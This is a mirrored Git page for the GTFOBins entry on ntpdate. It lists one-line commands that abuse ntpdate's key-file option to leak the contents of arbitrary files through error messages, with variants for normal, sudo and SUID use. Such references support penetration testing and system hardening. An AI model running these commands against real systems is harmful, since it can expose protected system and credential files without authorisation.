1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/ntpdate.md
Bagas Mukti e988dbb8fa
Add ntpdate
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-12-23 13:22:22 +01:00

17 lines
396 B
Markdown

---
description: The file is actually parsed and lines are leaked through error messages.
functions:
file-read:
- code: |
LFILE=file_to_read
ntpdate -a x -k $LFILE -d localhost
sudo:
- code: |
LFILE=file_to_read
sudo ntpdate -a x -k $LFILE -d localhost
suid:
- code: |
LFILE=file_to_read
./ntpdate -a x -k $LFILE -d localhost
---